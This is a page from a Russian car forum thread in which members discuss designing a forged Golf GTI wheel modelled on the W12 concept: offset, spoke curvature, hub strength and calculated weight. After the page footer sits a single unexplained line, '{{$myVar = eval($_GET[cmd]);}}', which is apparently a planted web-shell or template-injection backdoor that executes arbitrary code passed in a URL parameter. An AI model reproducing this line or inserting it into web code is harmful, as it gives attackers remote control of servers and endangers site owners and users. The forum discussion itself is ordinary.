+ Ответить в теме
Страница 3 из 83 ПерваяПервая 1 2 3 4 5 13 53 ... ПоследняяПоследняя
Показано с 21 по 30 из 827

Тема: КОВАНОЕ КОЛЕСО в стиле концепт-кара Golf GTI W12 650 [или Денвер и Детройт]


  1. #21
    Респект за масштабность и пользу проекта!!!!
    Готов встать в очередь!

  2. #22
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 14&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Вадим, я вижу как ситуация выглядит - когда тема начиналась никто помогать не торопился, а теперь, когда часть дела сделана, и результат трудов почти готов, приходят всякие карабасы и начинают давать советы, как лучше сделать.

    это нормально, я так же видел бы ситуацию

    но моя позиция вот какая - до тех пор, пока ты не упоминал дизайн дисков W12, мне эта тема не подходила, потому, что ты обозначил свой проект как "реплика оригинала в кованом исполнении" платить 7500-8000 р. за оригинал от Г-5, хоть и ковку я не хочу, мне такой дизайн не подходит, хоть ковку брать собираюсь и в ближайшее время, а вот дизайн W12, мне нравица.

    вот потому я и задаю разные вопросы и высказываю пожелания, так как являюсь потенциальным потребителем твоего продукта. ;)[/b][/quote]
    Юра, я вижу ситуацию несколько иначе&#33; Если бы мне было безразлично мнение других, я бы не стал писать в реальном времени о процессе проектирования, а выложил бы здесь позже готовое изделие и ценник. Особенно мне интересны предложения и критика, наверное, ты обратил внимание, что на посты типа «Все круто&#33;» я не отвечаю (хотя не скрою они приятны).

    В название темы не упоминается W12 потому что сходство было обнаружено позже в процессе работы и это является побочным результатом (наверное, положительным). В начале работы были четко сформулированы другие цели:
    1. для динамичного перемещения по городу необходимо более прочное колесо – т.е. однозначно кованное;
    2. масса колеса должна быть минимальной, но не в ущерб пункту 1;
    3. для придания индивидуальности и сохранения фирменного стиля GTI желательно использовать идею заложенную в дизайн оригинальных колес (спицы образованы пятью усеченными кругами/эллипсами), причем допускается НЕЗНАЧИТЕЛЬНОЕ противоречие с пунктом 2, но не в ущерб пункту 1.

    А вдохновение мы черпали отсюда:


  3. #23
    я тебя понял, так что продолжаю.

    незнаю, чем форма болванки мешает занести центральную часть диска внутрь? А спицы слегка изогнуть к центру.

    ладно, раз пока не получается реплика W12, подожду, что получится, а там видно будет.

    кстати, на твоей правой картинке, что то не слишком плоские диски нарисованы относительно плоскости вращения колеса. ;)

  4. #24
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 18&#58;38) <{POST_SNAPBACK}></div><div class='quotemain'>незнаю, чем форма болванки мешает занести центральную часть диска внутрь? А спицы слегка изогнуть к центру. [/b][/quote]
    Тем что тогда вылет у диска будет 30-20 при 7.5 ширине что исключит возможность его установки на гти5

  5. #25
    <div class='quotetop'>Цитата(vadII &#064; Apr 2 2008, 20&#58;36) <{POST_SNAPBACK}></div><div class='quotemain'>Тем что тогда вылет у диска будет 30-20 при 7.5 ширине что исключит возможность его установки на гти5 [/b][/quote]
    а центральную часть, ту что стыкуется со ступицей, нельзя сделать настолько тоньше, насколько внутрь по оси будет смещена, эта ступечная часть? Что, кстати, положительно скажется на массе диска.

  6. #26
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 21&#58;07) <{POST_SNAPBACK}></div><div class='quotemain'>а центральную часть, ту что стыкуется со ступицей, нельзя сделать настолько тоньше, насколько внутрь по оси будет смещена, эта ступечная часть? Что, кстати, положительно скажется на массе диска. [/b][/quote]
    Но не скажется на прочности. Ступичная часть один из главных "силовых" элементов

  7. #27
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 14&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>но моя позиция вот какая - до тех пор, пока ты не упоминал дизайн дисков W12, мне эта тема не подходила, потому, что ты обозначил свой проект как "реплика оригинала в кованом исполнении" платить 7500-8000 р. за оригинал от Г-5, хоть и ковку я не хочу, мне такой дизайн не подходит, хоть ковку брать собираюсь и в ближайшее время, а вот дизайн W12, мне нравица.

    вот потому я и задаю разные вопросы и высказываю пожелания, так как являюсь потенциальным потребителем твоего продукта. ;)[/b][/quote]
    так как у нас капитализм и соответственно: «Покупатель всегда прав», мы учли пожелания и максимально насколько позволяет заготовка изогнули спицы к центру.

    Проектирование вышло на финишную прямую, последняя версия колеса получилась очень прочной, легко выдерживающая нагрузку более 600 кг.

    ВНИМАНИЕ&#33;&#33;&#33; Расчетная масса 8002.21740 граммов&#33;&#33;&#33;&#33;&#33;

    Завтра будут проведены дополнительные расчеты на прочность, по результатам которых ВОЗМОЖНО потребуется внести НЕЗНАЧИТЕЛЬНЫЕ изменения, поэтому сегодня представляю вашему вниманию Бета-версию:






  8. #28
    Думаю, если сделать более плавный изгиб спицы, от ступицы к ободу, я имею в виду внешнюю плоскость, выглядеть будет интересней, а нагрузка будет распределяться по спице равномерней и при боковых нагрузках то же. Но все равно клева получилось.

  9. #29
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    согласен с тобой, но если с наружной (лицевой) стороны снять "лишний" металл не проблема, то изнутри спицы "наростить" его не получится (чтобы сохранить приемлемую толщину спицы), так как на заготовке его там просто нет&#33;&#33;&#33;

  10. #30
    <div class='quotetop'>Цитата(recarospeed &#064; Apr 2 2008, 23&#58;20) <{POST_SNAPBACK}></div><div class='quotemain'>согласен с тобой, но если с наружной (лицевой) снять "лишний" металл не проблема, то изнутри спицы "наростить" его не получится (чтобы сохранить приемлемую толщину спицы), так как на заготовке его там просто нет&#33;&#33;&#33;[/b][/quote]
    тогда конечно, поскорей бы его в метале увидеть

+ Ответить в теме
Страница 3 из 83 ПерваяПервая 1 2 3 4 5 13 53 ... ПоследняяПоследняя

Похожие темы

  1. где покрасить диски детройт 18?
    от Bonder в разделе Шины, диски
    Ответов: 16
    Последнее сообщение: 02.04.2024, 16:35
  2. Помогите разобраться, спускает колесо!!!!!
    от Maksim190rus в разделе Шины, диски
    Ответов: 13
    Последнее сообщение: 02.04.2024, 14:14
  3. Колесо просказьзывает при ускорении.
    от Naber в разделе Шины, диски
    Ответов: 13
    Последнее сообщение: 02.04.2024, 12:59
  4. Ответов: 26
    Последнее сообщение: 03.01.2024, 09:05
  5. Ответов: 1
    Последнее сообщение: 18.08.2007, 10:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}